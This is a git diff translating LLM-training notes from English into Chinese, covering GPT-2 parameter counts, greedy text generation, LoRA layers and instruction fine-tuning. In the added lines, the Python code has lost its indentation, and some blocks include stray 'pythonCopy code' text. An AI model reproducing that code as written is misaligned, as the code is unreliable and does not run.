-    "n_layers": 12,         # Number of layers
-    "drop_rate": 0.1,       # Dropout rate
-    "qkv_bias": False       # Query-Key-Value bias
+"vocab_size": 50257,    # Vocabulary size
+"context_length": 1024, # Context length
+"emb_dim": 768,         # Embedding dimension
+"n_heads": 12,          # Number of attention heads
+"n_layers": 12,         # Number of layers
+"drop_rate": 0.1,       # Dropout rate
+"qkv_bias": False       # Query-Key-Value bias
 }
 
 model = GPTModel(GPT_CONFIG_124M)
@@ -482,196 +467,178 @@ total_params = sum(p.numel() for p in model.parameters())
 print(f"Total number of parameters: {total_params:,}")
 # Total number of parameters: 163,009,536
 ```
+### **逐步计算**
 
-### **Step-by-Step Calculation**
-
-#### **1. Embedding Layers: Token Embedding & Position Embedding**
-
-- **Layer:** `nn.Embedding(vocab_size, emb_dim)`
-- **Parameters:** `vocab_size * emb_dim`
+#### **1. 嵌入层：标记嵌入和位置嵌入**
 
+- **层：** `nn.Embedding(vocab_size, emb_dim)`
+- **参数：** `vocab_size * emb_dim`
 ```python
 token_embedding_params = 50257 * 768 = 38,597,376
 ```
-
-- **Layer:** `nn.Embedding(context_length, emb_dim)`
-- **Parameters:** `context_length * emb_dim`
-
+- **层:** `nn.Embedding(context_length, emb_dim)`
+- **参数:** `context_length * emb_dim`
 ```python
 position_embedding_params = 1024 * 768 = 786,432
 ```
-
-**Total Embedding Parameters**
-
+**总嵌入参数**
 ```python
 embedding_params = token_embedding_params + position_embedding_params
 embedding_params = 38,597,376 + 786,432 = 39,383,808
 ```
-
 #### **2. Transformer Blocks**
 
-There are 12 transformer blocks, so we'll calculate the parameters for one block and then multiply by 12.
+有12个变换器块，因此我们将计算一个块的参数，然后乘以12。
 
-**Parameters per Transformer Block**
+**每个变换器块的参数**
 
-**a. Multi-Head Attention**
+**a. 多头注意力**
 
-- **Components:**
-  - **Query Linear Layer (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
-  - **Key Linear Layer (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
-  - **Value Linear Layer (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
-  - **Output Projection (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
-- **Calculations:**
+- **组件：**
+- **查询线性层 (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
+- **键线性层 (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
+- **值线性层 (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
+- **输出投影 (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
+- **计算：**
 
-  - **Each of `W_query`, `W_key`, `W_value`:**
+- **每个 `W_query`, `W_key`, `W_value`:**
 
-    ```python
-    qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
-    ```
+```python
+qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
+```
 
-    Since there are three such layers:
+由于有三个这样的层：
 
-    ```python
-    total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
-    ```
+```python
+total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
+```
 
-  - **Output Projection (`out_proj`):**
+- **输出投影 (`out_proj`):**
 
-    ```python
-    out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
-    ```
+```python
+out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
+```
 
-  - **Total Multi-Head Attention Parameters:**
+- **总多头注意力参数：**
 
-    ```python
-    mha_params = total_qkv_params + out_proj_params
-    mha_params = 1,769,472 + 590,592 = 2,360,064
-    ```
+```python
+mha_params = total_qkv_params + out_proj_params
+mha_params = 1,769,472 + 590,592 = 2,360,064
+```
 
-**b. FeedForward Network**
+**b. 前馈网络**
 
-- **Components:**
-  - **First Linear Layer:** `nn.Linear(emb_dim, 4 * emb_dim)`
-  - **Second Linear Layer:** `nn.Linear(4 * emb_dim, emb_dim)`
-- **Calculations:**
+- **组件：**
+- **第一线性层:** `nn.Linear(emb_dim, 4 * emb_dim)`
+- **第二线性层:** `nn.Linear(4 * emb_dim, emb_dim)`
+- **计算：**
 
-  - **First Linear Layer:**
+- **第一线性层：**
 
-    ```python
-    ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
-    ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368
-    ```
+```python
+ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
+ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368
+```
 
-  - **Second Linear Layer:**
+- **第二线性层：**
 
-    ```python
-    ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
-    ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064
-    ```
+```python
+ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
+ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064
+```
 
-  - **Total FeedForward Parameters:**
+- **总前馈参数：**
 
-    ```python
-    ff_params = ff_first_layer_params + ff_second_layer_params
-    ff_params = 2,362,368 + 2,360,064 = 4,722,432
-    ```
+```python
+ff_params = ff_first_layer_params + ff_second_layer_params
+ff_params = 2,362,368 + 2,360,064 = 4,722,432
+```
 
-**c. Layer Normalizations**
+**c. 层归一化**
 
-- **Components:**
-  - Two `LayerNorm` instances per block.
-  - Each `LayerNorm` has `2 * emb_dim` parameters (scale and shift).
-- **Calculations:**
+- **组件：**
+- 每个块有两个 `LayerNorm` 实例。
+- 每个 `LayerNorm` 有 `2 * emb_dim` 参数（缩放和偏移）。
+- **计算：**
 
-  ```python
-  pythonCopy codelayer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072
-  ```
-
-**d. Total Parameters per Transformer Block**
+```python
+layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072
+```
 
+**d. 每个变换器块的总参数**
 ```python
 pythonCopy codeparams_per_block = mha_params + ff_params + layer_norm_params_per_block
 params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
 ```
-
-**Total Parameters for All Transformer Blocks**
-
+**所有变换器块的总参数**
 ```python
 pythonCopy codetotal_transformer_blocks_params = params_per_block * n_layers
 total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
 ```
+#### **3. 最终层**
 
-#### **3. Final Layers**
-
-**a. Final Layer Normalization**
-
-- **Parameters:** `2 * emb_dim` (scale and shift)
+**a. 最终层归一化**
 
+- **参数:** `2 * emb_dim` (缩放和偏移)
 ```python
 pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536
 ```
+**b. 输出投影层 (`out_head`)**
 
-**b. Output Projection Layer (`out_head`)**
-
-- **Layer:** `nn.Linear(emb_dim, vocab_size, bias=False)`
-- **Parameters:** `emb_dim * vocab_size`
-
+- **层:** `nn.Linear(emb_dim, vocab_size, bias=False)`
+- **参数:** `emb_dim * vocab_size`
 ```python
 pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376
 ```
-
-#### **4. Summing Up All Parameters**
-
+#### **4. 汇总所有参数**
 ```python
 pythonCopy codetotal_params = (
-    embedding_params +
-    total_transformer_blocks_params +
-    final_layer_norm_params +
-    output_projection_params
+embedding_params +
+total_transformer_blocks_params +
+final_layer_norm_params +
+output_projection_params
 )
 total_params = (
-    39,383,808 +
-    85,026,816 +
-    1,536 +
-    38,597,376
+39,383,808 +
+85,026,816 +
+1,536 +
+38,597,376
 )
 total_params = 163,009,536
 ```
+## 生成文本
 
-## Generate Text
-
-Having a model that predicts the next token like the one before, it's just needed to take the last token values from the output (as they will be the ones of the predicted token), which will be a **value per entry in the vocabulary** and then use the `softmax` function to normalize the dimensions into probabilities that sums 1 and then get the index of the of the biggest entry, which will be the index of the word inside the vocabulary.
-
-Code from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
+拥有一个像之前那样预测下一个标记的模型，只需从输出中获取最后一个标记的值（因为它们将是预测标记的值），这将是**词汇表中每个条目的值**，然后使用`softmax`函数将维度归一化为总和为1的概率，然后获取最大条目的索引，这将是词汇表中单词的索引。
 
+来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
 ```python
 def generate_text_simple(model, idx, max_new_tokens, context_size):
-    # idx is (batch, n_tokens) array of indices in the current context
-    for _ in range(max_new_tokens):
+# idx is (batch, n_tokens) array of indices in the current context
+for _ in range(max_new_tokens):
 
-        # Crop current context if it exceeds the supported context size
-        # E.g., if LLM supports only 5 tokens, and the context size is 10
-        # then only the last 5 tokens are used as context
-        idx_cond = idx[:, -context_size:]
+# Crop current context if it exceeds the supported context size
+# E.g., if LLM supports only 5 tokens, and the context size is 10
+# then only the last 5 tokens are used as context
+idx_cond = idx[:, -context_size:]
 
-        # Get the predictions
-        with torch.no_grad():
-            logits = model(idx_cond)
+# Get the predictions
+with torch.no_grad():
+logits = model(idx_cond)
 
-        # Focus only on the last time step
-        # (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
-        logits = logits[:, -1, :]
+# Focus only on the last time step
+# (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
+logits = logits[:, -1, :]
 
-        # Apply softmax to get probabilities
-        probas = torch.softmax(logits, dim=-1)  # (batch, vocab_size)
+# Apply softmax to get probabilities
+probas = torch.softmax(logits, dim=-1)  # (batch, vocab_size)
 
-        # Get the idx of the vocab entry with the highest probability value
-        idx_next = torch.argmax(probas, dim=-1, keepdim=True)  # (batch, 1)
+# Get the idx of the vocab entry with the highest probability value
+idx_next = torch.argmax(probas, dim=-1, keepdim=True)  # (batch, 1)
 
-        # Append sampled index to the running sequence
-        idx = torch.cat((idx, idx_next), dim=1)  # (batch, n_tokens+1)
+# Append sampled index to the running sequence
+idx = torch.cat((idx, idx_next), dim=1)  # (batch, n_tokens+1)
 
-    return idx
+return idx
 
 
 start_context = "Hello, I am"
@@ -685,17 +652,15 @@ print("encoded_tensor.shape:", encoded_tensor.shape)
 model.eval() # disable dropout
 
 out = generate_text_simple(
-    model=model,
-    idx=encoded_tensor,
-    max_new_tokens=6,
-    context_size=GPT_CONFIG_124M["context_length"]
+model=model,
+idx=encoded_tensor,
+max_new_tokens=6,
+context_size=GPT_CONFIG_124M["context_length"]
 )
 
 print("Output:", out)
 print("Output length:", len(out[0]))
 ```
-
-## References
+## 参考文献
 
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
diff --git a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
index fa5817f83..858308d45 100644
--- a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
+++ b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
@@ -1,64 +1,61 @@
-# 7.0. LoRA Improvements in fine-tuning
+# 7.0. LoRA 在微调中的改进
 
-## LoRA Improvements
+## LoRA 改进
 
 > [!TIP]
-> The use of **LoRA reduce a lot the computation** needed to **fine tune** already trained models.
+> 使用 **LoRA 大大减少了所需的计算** 来 **微调** 已经训练好的模型。
 
-LoRA makes it possible to fine-tune **large models** efficiently by only changing a **small part** of the model. It reduces the number of parameters you need to train, saving **memory** and **computational resources**. This is because:
+LoRA 使得通过仅更改模型的 **小部分** 来高效地微调 **大模型** 成为可能。它减少了需要训练的参数数量，从而节省了 **内存** 和 **计算资源**。这是因为：
 
-1. **Reduces the Number of Trainable Parameters**: Instead of updating the entire weight matrix in the model, LoRA **splits** the weight matrix into two smaller matrices (called **A** and **B**). This makes training **faster** and requires **less memory** because fewer parameters need to be updated.
+1. **减少可训练参数的数量**：LoRA **将** 权重矩阵分成两个较小的矩阵（称为 **A** 和 **B**），而不是更新模型中的整个权重矩阵。这使得训练 **更快**，并且需要 **更少的内存**，因为需要更新的参数更少。
 
-   1. This is because instead of calculating the complete weight update of a layer (matrix), it approximates it to a product of 2 smaller matrices reducing the update to calculate:\
+1. 这是因为它不是计算一个层（矩阵）的完整权重更新，而是将其近似为两个较小矩阵的乘积，从而减少了计算更新的复杂性：\
+   
+<figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
 
-      <figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
-
-2. **Keeps Original Model Weights Unchanged**: LoRA allows you to keep the original model weights the same, and only updates the **new small matrices** (A and B). This is helpful because it means the model’s original knowledge is preserved, and you only tweak what's necessary.
-3. **Efficient Task-Specific Fine-Tuning**: When you want to adapt the model to a **new task**, you can just train the **small LoRA matrices** (A and B) while leaving the rest of the model as it is. This is **much more efficient** than retraining the entire model.
-4. **Storage Efficiency**: After fine-tuning, instead of saving a **whole new model** for each task, you only need to store the **LoRA matrices**, which are very small compared to the entire model. This makes it easier to adapt the model to many tasks without using too much storage.
-
-In order to implemente LoraLayers instead of Linear ones during a fine tuning, this code is proposed here [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
+2. **保持原始模型权重不变**：LoRA 允许您保持原始模型权重不变，仅更新 **新的小矩阵**（A 和 B）。这很有帮助，因为这意味着模型的原始知识得以保留，您只需调整必要的部分。
+3. **高效的任务特定微调**：当您想将模型适应于 **新任务** 时，您只需训练 **小的 LoRA 矩阵**（A 和 B），而将模型的其余部分保持不变。这比重新训练整个模型 **高效得多**。
+4. **存储效率**：微调后，您只需存储 **LoRA 矩阵**，而不是为每个任务保存 **整个新模型**，这些矩阵与整个模型相比非常小。这使得将模型适应于多个任务而不占用过多存储变得更容易。
 
+为了在微调过程中实现 LoraLayers 而不是线性层，这里提出了以下代码 [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb)：
 ```python
 import math
 
 # Create the LoRA layer with the 2 matrices and the alpha
 class LoRALayer(torch.nn.Module):
-    def __init__(self, in_dim, out_dim, rank, alpha):
-        super().__init__()
-        self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
-        torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5))  # similar to standard weight initialization
-        self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
-        self.alpha = alpha
+def __init__(self, in_dim, out_dim, rank, alpha):
+super().__init__()
+self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
+torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5))  # similar to standard weight initialization
+self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
+self.alpha = alpha
 
-    def forward(self, x):
-        x = self.alpha * (x @ self.A @ self.B)
-        return x
+def forward(self, x):
+x = self.alpha * (x @ self.A @ self.B)
+return x
 
 # Combine it with the linear layer
 class LinearWithLoRA(torch.nn.Module):
-    def __init__(self, linear, rank, alpha):
-        super().__init__()
-        self.linear = linear
-        self.lora = LoRALayer(
-            linear.in_features, linear.out_features, rank, alpha
-        )
+def __init__(self, linear, rank, alpha):
+super().__init__()
+self.linear = linear
+self.lora = LoRALayer(
+linear.in_features, linear.out_features, rank, alpha
+)
 
-    def forward(self, x):
-        return self.linear(x) + self.lora(x)
+def forward(self, x):
+return self.linear(x) + self.lora(x)
 
 # Replace linear layers with LoRA ones
 def replace_linear_with_lora(model, rank, alpha):
-    for name, module in model.named_children():
-        if isinstance(module, torch.nn.Linear):
-            # Replace the Linear layer with LinearWithLoRA
-            setattr(model, name, LinearWithLoRA(module, rank, alpha))
-        else:
-            # Recursively apply the same function to child modules
-            replace_linear_with_lora(module, rank, alpha)
+for name, module in model.named_children():
+if isinstance(module, torch.nn.Linear):
+# Replace the Linear layer with LinearWithLoRA
+setattr(model, name, LinearWithLoRA(module, rank, alpha))
+else:
+# Recursively apply the same function to child modules
+replace_linear_with_lora(module, rank, alpha)
 ```
-
-## References
+## 参考文献
 
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
diff --git a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
index 13342ef1a..ee57dc464 100644
--- a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
+++ b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
@@ -1,14 +1,13 @@
-# 7.2. Fine-Tuning to follow instructions
+# 7.2. 微调以遵循指令
 
 > [!TIP]
-> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
+> 本节的目标是展示如何**微调一个已经预训练的模型以遵循指令**，而不仅仅是生成文本，例如，作为聊天机器人响应任务。
 
-## Dataset
+## 数据集
 
-I order to fine tune a LLM to follow instructions it's needed to have a dataset with instructions and responses to fine tune the LLM. There are different formats to train a LLM into follow instructions, for example:
-
-- The Apply Alpaca prompt style example:
+为了微调一个 LLM 以遵循指令，需要有一个包含指令和响应的数据集来微调 LLM。有不同的格式可以训练 LLM 以遵循指令，例如：
 
+- Apply Alpaca 提示样式示例：
 ```csharp
 Below is an instruction that describes a task. Write a response that appropriately completes the request.
 
@@ -20,9 +19,7 @@ The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging
 
 \( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
 ```
-
-- Phi-3 Prompt Style Example:
-
+- Phi-3 提示样式示例：
 ```vbnet
 <|User|>
 Can you explain what gravity is in simple terms?
@@ -30,23 +27,21 @@ Can you explain what gravity is in simple terms?
 <|Assistant|>
 Absolutely! Gravity is a force that pulls objects toward each other.
 ```
+使用这些数据集训练LLM，而不仅仅是原始文本，可以帮助LLM理解它需要对收到的问题给出具体的回答。
 
-Training a LLM with these kind of data sets instead of just raw text help the LLM understand that he needs to give specific responses to the questions is receives.
-
-Therefore, one of the first things to do with a dataset that contains requests and answers is to model that date in the desired prompt format, like:
-
+因此，处理包含请求和答案的数据集时，首先要做的事情之一是将这些数据建模为所需的提示格式，例如：
 ```python
 # Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
 def format_input(entry):
-    instruction_text = (
-        f"Below is an instruction that describes a task. "
-        f"Write a response that appropriately completes the request."
-        f"\n\n### Instruction:\n{entry['instruction']}"
-    )
+instruction_text = (
+f"Below is an instruction that describes a task. "
+f"Write a response that appropriately completes the request."
+f"\n\n### Instruction:\n{entry['instruction']}"
+)
 
-    input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""
+input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""
 
-    return instruction_text + input_text
+return instruction_text + input_text
 
 model_input = format_input(data[50])
 
@@ -54,54 +49,52 @@ desired_response = f"\n\n### Response:\n{data[50]['output']}"
 
 print(model_input + desired_response)
 ```
+然后，像往常一样，需要将数据集分为训练集、验证集和测试集。
 
-Then, as always, it's needed to separate the dataset in sets for training, validation and testing.
+## 批处理和数据加载器
 
-## Batching & Data Loaders
+然后，需要将所有输入和期望输出进行批处理以进行训练。为此，需要：
 
-Then, it's needed to batch all the inputs and expected outputs for the training. For this, it's needed to:
+- 对文本进行标记化
+- 将所有样本填充到相同的长度（通常长度将与用于预训练LLM的上下文长度相同）
+- 在自定义合并函数中将输入向右移动1以创建期望的标记
+- 用-100替换一些填充标记，以将其排除在训练损失之外：在第一个`endoftext`标记之后，将所有其他`endoftext`标记替换为-100（因为使用`cross_entropy(...,ignore_index=-100)`意味着它将忽略目标为-100的标记）
+- \[可选\] 使用-100掩盖所有属于问题的标记，以便LLM仅学习如何生成答案。在应用Alpaca风格时，这将意味着掩盖所有内容直到`### Response:`
 
-- Tokenize the texts
-- Pad all the samples to the same length (usually the length will be as big as the context length used to pre-train the LLM)
-- Create the expected tokens by shifting 1 the input in a custom collate function
-- Replace some padding tokens with -100 to exclude them from the training loss: After the first `endoftext` token, substitute all the other `endoftext` tokens by -100 (because using `cross_entropy(...,ignore_index=-100)` means that it'll ignore targets with -100)
-- \[Optional] Mask using -100 also all the tokens belonging to the question so the LLM learns only how to generate the answer. In the Apply Alpaca style this will mean to mask everything until `### Response:`
+创建好这些后，是时候为每个数据集（训练、验证和测试）创建数据加载器了。
 
-With this created, it's time to crate the data loaders for each dataset (training, validation and test).
+## 加载预训练LLM & 微调 & 损失检查
 
-## Load pre-trained LLM & Fine tune & Loss Checking
+需要加载一个预训练的LLM进行微调。这在其他页面中已经讨论过。然后，可以使用之前使用的训练函数来微调LLM。
 
-It's needed to load a pre-trained LLM to fine tune it. This was already discussed in other pages. Then, it's possible to use the previously used training function to fine tune the LLM.
+在训练过程中，还可以查看训练损失和验证损失在各个时期的变化，以查看损失是否在减少以及是否发生了过拟合。\
+请记住，过拟合发生在训练损失减少但验证损失没有减少甚至增加时。为避免这种情况，最简单的方法是在这种行为开始的时期停止训练。
 
-During the training it's also possible to see how the training loss and validation loss varies during the epochs to see if the loss is getting reduced and if overfitting is ocurring.\
-Remember that overfitting occurs when the training loss is getting reduced but the validation loss is not being reduced or even increasing. To avoid this, the simplest thing to do is to stop the training at the epoch where this behaviour start.
+## 响应质量
 
-## Response Quality
+由于这不是一个分类微调，因此不太可能信任损失变化，因此检查测试集中的响应质量也很重要。因此，建议从所有测试集中收集生成的响应并**手动检查其质量**，以查看是否存在错误答案（请注意，LLM可能正确生成响应句子的格式和语法，但给出完全错误的响应。损失变化不会反映这种行为）。\
+请注意，也可以通过将生成的响应和期望的响应传递给**其他LLM并要求它们评估响应**来进行此审查。
 
-As this is not a classification fine-tune were it's possible to trust more the loss variations, it's also important to check the quality of the responses in the testing set. Therefore, it's recommended to gather the generated responses from all the testing sets and **check their quality manually** to see if there are wrong answers (note that it's possible for the LLM to create correctly the format and syntax of the response sentence but gives a completely wrong response. The loss variation won't reflect this behaviour).\
-Note that it's also possible to perform this review by passing the generated responses and the expected responses to **other LLMs and ask them to evaluate the responses**.
+验证响应质量的其他测试：
 
-Other test to run to verify the quality of the responses:
+1. **测量大规模多任务语言理解 (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU评估模型在57个学科（包括人文学科、科学等）中的知识和解决问题的能力。它使用多项选择题在不同难度级别（从初级到高级专业）评估理解能力。
+2. [**LMSYS聊天机器人竞技场**](https://arena.lmsys.org): 该平台允许用户并排比较不同聊天机器人的响应。用户输入提示，多个聊天机器人生成可以直接比较的响应。
+3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval是一个自动评估框架，其中像GPT-4这样的高级LLM评估其他模型对各种提示的响应。
+4. **通用语言理解评估 (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE是九个自然语言理解任务的集合，包括情感分析、文本蕴含和问答。
+5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** 在GLUE的基础上，SuperGLUE包括更具挑战性的任务，旨在对当前模型构成困难。
+6. **超越模仿游戏基准 (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench是一个大规模基准，包含200多个任务，测试模型在推理、翻译和问答等领域的能力。
+7. **语言模型的整体评估 (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM提供了在准确性、鲁棒性和公平性等各种指标上的综合评估。
+8. [**OpenAI评估**](https://github.com/openai/evals)**:** OpenAI的开源评估框架，允许在自定义和标准化任务上测试AI模型。
+9. [**HumanEval**](https://github.com/openai/human-eval)**:** 一组用于评估语言模型代码生成能力的编程问题。
+10. **斯坦福问答数据集 (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD由关于维基百科文章的问题组成，模型必须理解文本以准确回答。
+11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** 一个大规模的琐事问题和答案数据集，以及证据文档。
 
-1. **Measuring Massive Multitask Language Understanding (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU evaluates a model's knowledge and problem-solving abilities across 57 subjects, including humanities, sciences, and more. It uses multiple-choice questions to assess understanding at various difficulty levels, from elementary to advanced professional.
-2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): This platform allows users to compare responses from different chatbots side by side. Users input a prompt, and multiple chatbots generate responses that can be directly compared.
-3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval is an automated evaluation framework where an advanced LLM like GPT-4 assesses the responses of other models to various prompts.
-4. **General Language Understanding Evaluation (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE is a collection of nine natural language understanding tasks, including sentiment analysis, textual entailment, and question answering.
-5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Building upon GLUE, SuperGLUE includes more challenging tasks designed to be difficult for current models.
-6. **Beyond the Imitation Game Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench is a large-scale benchmark with over 200 tasks that test a model's abilities in areas like reasoning, translation, and question answering.
-7. **Holistic Evaluation of Language Models (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM provides a comprehensive evaluation across various metrics like accuracy, robustness, and fairness.
-8. [**OpenAI Evals**](https://github.com/openai/evals)**:** An open-source evaluation framework by OpenAI that allows for the testing of AI models on custom and standardized tasks.
-9. [**HumanEval**](https://github.com/openai/human-eval)**:** A collection of programming problems used to evaluate code generation abilities of language models.
-10. **Stanford Question Answering Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD consists of questions about Wikipedia articles, where models must comprehend the text to answer accurately.
-11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** A large-scale dataset of trivia questions and answers, along with evidence documents.
+还有很多很多其他的
 
-and many many more
+## 跟随指令微调代码
 
-## Follow instructions fine-tuning code
+您可以在[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)找到执行此微调的代码示例。
 
-You can find an example of the code to perform this fine tuning in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)
-
-## References
+## 参考文献
 
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
diff --git a/src/todo/llm-training-data-preparation/README.md b/src/todo/llm-training-data-preparation/README.md
index 35cbc6ae9..1c3b96924 100644
--- a/src/todo/llm-training-data-preparation/README.md
+++ b/src/todo/llm-training-data-preparation/README.md
@@ -1,99 +1,98 @@
-# LLM Training - Data Preparation
+# LLM 训练 - 数据准备
 
-**These are my notes from the very recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.**
+**这些是我从非常推荐的书中做的笔记** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **以及一些额外的信息。**
 
-## Basic Information
+## 基本信息
 
-You should start by reading this post for some basic concepts you should know about:
+您应该先阅读这篇文章，以了解一些您应该知道的基本概念：
 
 {{#ref}}
 0.-basic-llm-concepts.md
 {{#endref}}
 
-## 1. Tokenization
+## 1. 分词
 
 > [!TIP]
-> The goal of this initial phase is very simple: **Divide the input in tokens (ids) in some way that makes sense**.
+> 这个初始阶段的目标非常简单：**以某种有意义的方式将输入划分为标记（ID）。**
 
 {{#ref}}
 1.-tokenizing.md
 {{#endref}}
 
-## 2. Data Sampling
+## 2. 数据采样
 
 > [!TIP]
-> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**
+> 这个第二阶段的目标非常简单：**对输入数据进行采样，并为训练阶段准备数据，通常通过将数据集分成特定长度的句子，并生成预期的响应。**
 
 {{#ref}}
 2.-data-sampling.md
 {{#endref}}
 
-## 3. Token Embeddings
+## 3. 标记嵌入
 
 > [!TIP]
-> The goal of this third phase is very simple: **Assign each of the previous tokens in the vocabulary a vector of the desired dimensions to train the model.** Each word in the vocabulary will a point in a space of X dimensions.\
-> Note that initially the position of each word in the space is just initialised "randomly" and these positions are trainable parameters (will be improved during the training).
+> 这个第三阶段的目标非常简单：**为词汇表中的每个标记分配一个所需维度的向量以训练模型。** 词汇表中的每个单词将在 X 维空间中有一个点。\
+> 请注意，最初每个单词在空间中的位置是“随机”初始化的，这些位置是可训练的参数（在训练过程中会得到改善）。
 >
-> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute possition of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning).
+> 此外，在标记嵌入过程中**创建了另一层嵌入**，它表示（在这种情况下）**单词在训练句子中的绝对位置**。这样，句子中不同位置的单词将具有不同的表示（含义）。
 
 {{#ref}}
 3.-token-embeddings.md
 {{#endref}}
 
-## 4. Attention Mechanisms
+## 4. 注意机制
 
 > [!TIP]
